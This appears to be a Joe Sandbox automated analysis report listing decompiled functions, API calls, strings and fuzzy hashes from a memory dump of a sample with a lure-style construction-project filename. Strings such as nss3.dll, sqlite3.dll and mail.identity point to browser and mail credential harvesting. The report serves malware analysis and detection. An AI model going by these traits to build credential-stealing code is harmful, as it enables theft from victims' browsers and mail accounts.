                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: strlen$_mbscat
                                                                                                                          • String ID: 3CD
                                                                                                                          • API String ID: 3951308622-1938365332
                                                                                                                          • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                          • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                          • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                          • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                          Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1860491036-0
                                                                                                                          • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                          • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                          • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                          • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                          Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040D2C2
                                                                                                                          • memset.MSVCRT ref: 0040D2D8
                                                                                                                          • memset.MSVCRT ref: 0040D2EA
                                                                                                                          • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                          • memset.MSVCRT ref: 0040D319
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$memcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 368790112-0
                                                                                                                          • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                          • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                          • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                          • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                          Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • too many SQL variables, xrefs: 0042C6FD
                                                                                                                          • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                          • API String ID: 2221118986-515162456
                                                                                                                          • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                          • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                          • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                          • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                          Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                          • memset.MSVCRT ref: 004026AD
                                                                                                                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                            • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                            • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                          • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3503910906-0
                                                                                                                          • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                          • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                          • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                          • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                          Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                                            • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                                          • strlen.MSVCRT ref: 0040B60B
                                                                                                                          • atoi.MSVCRT(?,00000000,?,74DF0A60,?,00000000), ref: 0040B619
                                                                                                                          • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                          • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4107816708-0
                                                                                                                          • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                          • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                          • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                          • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                          Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                                          • _gmtime64.MSVCRT ref: 00411437
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                                          • strftime.MSVCRT ref: 00411476
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1886415126-0
                                                                                                                          • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                          • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                                          • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                          • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                                          Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: strlen
                                                                                                                          • String ID: >$>$>
                                                                                                                          • API String ID: 39653677-3911187716
                                                                                                                          • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                          • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                          • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                          • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                          Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                                          • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                          • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                          • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                          • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                          Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strcmpi
                                                                                                                          • String ID: C@$mail.identity
                                                                                                                          • API String ID: 1439213657-721921413
                                                                                                                          • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                          • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                          • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                          • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                          Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00406640
                                                                                                                            • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                            • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                            • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                          • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                                          • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset$memcmp
                                                                                                                          • String ID: Ul@
                                                                                                                          • API String ID: 270934217-715280498
                                                                                                                          • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                          • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                          • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                          • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                          Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                          Strings
                                                                                                                          • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                          • String ID: recovered %d pages from %s
                                                                                                                          • API String ID: 985450955-1623757624
                                                                                                                          • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                          • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                                          • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                          • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                                          Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _ultoasprintf
                                                                                                                          • String ID: %s %s %s
                                                                                                                          • API String ID: 432394123-3850900253
                                                                                                                          • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                          • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                          • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                          • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                          Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                          • sprintf.MSVCRT ref: 0040909B
                                                                                                                            • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                            • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                            • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                            • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                            • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                          • String ID: menu_%d
                                                                                                                          • API String ID: 1129539653-2417748251
                                                                                                                          • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                          • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                          • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                          • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                          Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                          • _mbscat.MSVCRT ref: 004070FA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscat$_mbscpystrlen
                                                                                                                          • String ID: sqlite3.dll
                                                                                                                          • API String ID: 1983510840-1155512374
                                                                                                                          • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                                          • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                          • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                                          • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                          Function 004073CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                                          • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LongWindow
                                                                                                                          • String ID: MZ@
                                                                                                                          • API String ID: 1378638983-2978689999
                                                                                                                          • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                                          • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                                                                                          • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                                          • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                                                          Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
